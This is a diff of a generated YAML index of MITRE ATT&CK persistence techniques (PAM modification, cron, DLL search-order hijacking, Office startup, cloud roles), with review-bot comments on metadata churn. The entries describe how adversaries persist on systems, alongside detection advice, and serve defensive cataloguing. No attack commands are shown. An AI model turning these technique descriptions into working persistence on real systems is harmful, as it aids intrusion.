+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests:
- name: Malicious PAM rule
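Review bot: the five `external_references` entries for T1556.003 are emitted with identical content but in a different order (`PAM Creds` now precedes `Red Hat PAM`) and with `description` and `url` swapped within each entry, turning a no-op into a rewrite of the whole block; if the generator can sort references by `source_name` and emit keys in a fixed order, diffs like this one shrink to the substantive changes. Those substantive changes here are the removal of `x_mitre_permissions_required: [root]` and the bump to `x_mitre_version: '2.1'` / `x_mitre_attack_spec_version: 3.2.0`; if any consumer reads the permissions field, it now needs a default.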
@@ -33398,7 +33787,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -33486,7 +33874,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -33571,11 +33958,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
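Review bot: `modified` for T1133 moves backwards, from `2023-05-09T14:00:00.188Z` to `2023-03-30T21:01:36.318Z`, the same pattern as T1205.002 earlier in this diff where a `14:00:00.188Z` batch timestamp is replaced by an earlier, finer-grained one; confirm the generator's source bundle is the intended one, since consumers ordering by `modified` will now rank this technique as older.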
@@ -33653,7 +34039,6 @@ persistence:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1546.006:
@@ -33686,7 +34071,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -33709,11 +34094,10 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -33771,9 +34155,8 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1542.001:
@@ -33854,12 +34237,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
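Review bot: pre-existing, not introduced here: in the T1574.011 description context the registry path `HKLM\SYSTEM\CurrentControlSet\Services` ends one line and the sentence's full stop begins the next, so inside the `|-` block scalar the rendered description contains a line break between the path and the period. The text mirrors the upstream ATT&CK description, so correct it upstream rather than hand-editing the generated index.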
@@ -33878,7 +34260,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -33892,7 +34273,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -33919,8 +34299,8 @@ persistence:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -33951,7 +34331,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
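Review bot: the `x_mitre_attack_spec_version` bump for T1574.011 from 2.1.0 to 3.2.0 is the one substantive change in this object, but it is spread over three hunks: the `2.1.0` line and `x_mitre_modified_by_ref` are removed earlier in the object and re-added here at the end with the new value. Emitting keys in a stable order from the generator (or sorting them) would turn bumps like this into one-line changes a reviewer can actually see.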
@@ -34008,11 +34389,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -34084,9 +34464,9 @@ persistence:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -34102,12 +34482,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -34182,7 +34561,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1542.005:
@@ -34225,7 +34603,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -34249,8 +34627,6 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1543.003:
technique:
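Review bot: T1542.005 loses both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` here with nothing re-adding an attack spec version, unlike the other techniques in this diff, which end up at 3.2.0, and its `modified` date moved back from 2021-04-29 to 2020-10-22 in the previous hunk. Confirm this object comes from the same source bundle as the rest; if the upstream object genuinely lacks the field, anything reading this index has to tolerate a missing `x_mitre_attack_spec_version`.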
@@ -34405,31 +34781,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
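Review bot: this 31-line hunk for T1053.003 carries a single substantive change, the `modified` timestamp; every other removed line (platforms, domains, marking refs, id, type, created, external references) reappears later in the same object in a different order. Reordering diffs of this size bury the real changes (the version bump and the new `x_mitre_deprecated`, `revoked` and `x_mitre_remote_support` fields in the following hunks); a fixed key order in the generator would reduce this hunk to one line.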
@@ -34446,6 +34802,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -34456,9 +34813,13 @@ persistence:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -34466,8 +34827,24 @@ persistence:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests:
- name: Cron - Replace crontab with referenced file
@@ -34586,11 +34963,15 @@ persistence:
'
T1137:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:01:21.255Z'
+ name: Office Application Startup
+ description: |-
+ Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+ A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Nick Carr, Mandiant
- Microsoft Threat Intelligence Center (MSTIC)
@@ -34598,79 +34979,73 @@ persistence:
- Praetorian
- Loic Jaquemet
- Ricardo Dias
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+ Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.4'
+ x_mitre_data_sources:
+ - 'File: File Creation'
+ - 'Application Log: Application Log Content'
+ - 'Windows Registry: Windows Registry Key Modification'
+ - 'File: File Modification'
+ - 'Module: Module Load'
+ - 'Process: Process Creation'
+ - 'Windows Registry: Windows Registry Key Creation'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
created: '2017-12-14T16:46:06.044Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137
url: https://attack.mitre.org/techniques/T1137
- - source_name: SensePost Ruler GitHub
- url: https://github.com/sensepost/ruler
- description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
- services. Retrieved February 4, 2019.'
+ external_id: T1137
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- source_name: TechNet O365 Outlook Rules
- url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
description: Koeller, B.. (2018, February 21). Defending Against Rules and
Forms Injection. Retrieved November 5, 2019.
+ url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
- source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: SensePost Ruler GitHub
+ description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+ services. Retrieved February 4, 2019.'
+ url: https://github.com/sensepost/ruler
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Office Application Startup
- description: |-
- Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
- A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- x_mitre_detection: |-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
- Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
- x_mitre_version: '1.3'
+ url: https://github.com/sensepost/notruler
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'File: File Creation'
- - 'Application Log: Application Log Content'
- - 'Windows Registry: Windows Registry Key Modification'
- - 'File: File Modification'
- - 'Module: Module Load'
- - 'Process: Process Creation'
- - 'Windows Registry: Windows Registry Key Creation'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1137
atomic_tests: []
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
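Review bot: `x_mitre_permissions_required` (User, Administrator) is removed from T1137 near the end of the hunk and is not re-added anywhere in the reordered object, and the platform list changes from 'Windows, Office 365' to 'Windows, Office Suite'. Both are silent schema changes for consumers of this index: a filter on permissions now matches nothing for T1137, and any per-platform view keyed on 'Office 365' drops the technique. If the field removal and platform rename come from upstream ATT&CK, say so in the PR description, and regenerate any derived per-platform index in the same change.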
@@ -34700,6 +35075,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -34710,6 +35086,7 @@ persistence:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -34718,13 +35095,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
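Review bot: T1098.003's platforms lose 'Office 365', 'Google Workspace' and 'Azure AD' and gain 'Office Suite' and 'Identity Provider', with `x_mitre_version` bumped from 2.4 to 2.5. This matches the upstream ATT&CK platform consolidation, but it changes which per-platform index a technique lands in: anything that selects by the old names (an Azure AD or Google Workspace view) will silently lose this technique unless its selectors are updated to the new names in the same change.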
@@ -34766,9 +35143,6 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
@@ -34836,19 +35210,18 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -34864,8 +35237,8 @@ persistence:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
